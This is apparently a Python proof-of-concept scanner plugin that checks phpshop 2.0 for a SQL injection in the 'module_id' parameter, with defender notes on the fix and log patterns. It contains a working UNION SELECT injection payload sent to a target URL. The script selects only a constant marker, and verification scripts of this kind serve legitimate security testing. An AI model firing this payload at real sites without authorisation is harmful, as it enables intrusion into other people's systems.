#!/usr/bin/env python
# coding: utf-8

from peppa_pc import requests as req
from peppa_pc import POCBase, OutPut
import re


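class TestPOC(POCBase):
    """Verification check for the phpshop 2.0 ``module_id`` SQL injection.

    The check sends one GET request whose ``module_id`` value closes the
    quoted literal and appends a ``UNION SELECT`` returning a constant
    marker. The marker is written in the request only as hex literals, so
    the plain marker text can appear in the response body only if the
    database evaluated the ``CONCAT`` expression. A page that merely echoes
    the request URL does not produce a match. No application data is
    selected by the query.

    Defender notes:
      * Root cause (per ``info``): the id value reaches a SQL statement
        without proper filtering. The durable fix is server-side: bind the
        value as a query parameter, or cast it to an integer before use.
      * In web-server or WAF logs, requests to ``page=admin/function_list``
        whose ``module_id`` contains a quote or ``union select`` are the
        pattern this check generates.
    """

    pid = 'SSV-77845'  # vulnerability ID
    version = '1'
    name = 'CMS phpshop 2.0 - SQL Injection Vulnerability'
    author = 'tudou'
    create_date = '2015-10-16'
    update_date = '2015-10-16'
    app_name = 'phpshop'
    app_version = '2.0'
    vul_type = 'SQL Injection'
    # English gloss of the text below: on
    # ?page=admin/function_list&module_id=11 the id variable is not filtered
    # correctly, which leads to a SQL injection vulnerability.
    info = '''
           ?page=admin/function_list&module_id=11 id变量未正确过滤,导致SQL注入漏洞
    '''
    # Sample sites used to exercise the check (none recorded).
    samples = ['']

    def verify(self):
        """Send the probe request and report whether the marker came back.

        Returns:
            The object produced by ``parse_attack``: a success carrying the
            probed URL under ``VerifyInfo`` when the marker is found in the
            response body, otherwise a failure.
        """
        result = {}
        # The three hex literals decode to 'qbxvq', 'PfNhXNLXCR' and 'qjqqq';
        # concatenated they form the marker searched for below.
        target_url = "/phpshop 2.0/?page=admin/function_list&module_id=11' union select 1,CONCAT(0x7162787671,0x50664e68584e4c584352,0x716a717171),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --"
        # self.url and self.headers are presumably supplied by POCBase;
        # verify against the framework.
        response = req.get(self.url + target_url, headers=self.headers, timeout=10)
        body = response.content
        # The original searched with a text regex, which raises TypeError on
        # Python 3 when the body is bytes. Compare bytes with bytes instead;
        # the marker is a fixed literal, so no regex is needed.
        if not isinstance(body, bytes):
            body = body.encode('utf-8', 'replace')
        if b'qbxvqPfNhXNLXCRqjqqq' in body:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url + target_url
        return self.parse_attack(result)

    def attack(self):
        """Run the same non-destructive check as ``verify``."""
        return self.verify()

    def parse_attack(self, result):
        """Wrap ``result`` in an ``OutPut`` for the framework.

        Args:
            result: dict built by ``verify``; empty when no marker was seen.

        Returns:
            An ``OutPut`` marked successful when ``result`` is non-empty,
            otherwise marked failed with a fixed message.
        """
        output = OutPut(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet Nothing returned')
        return output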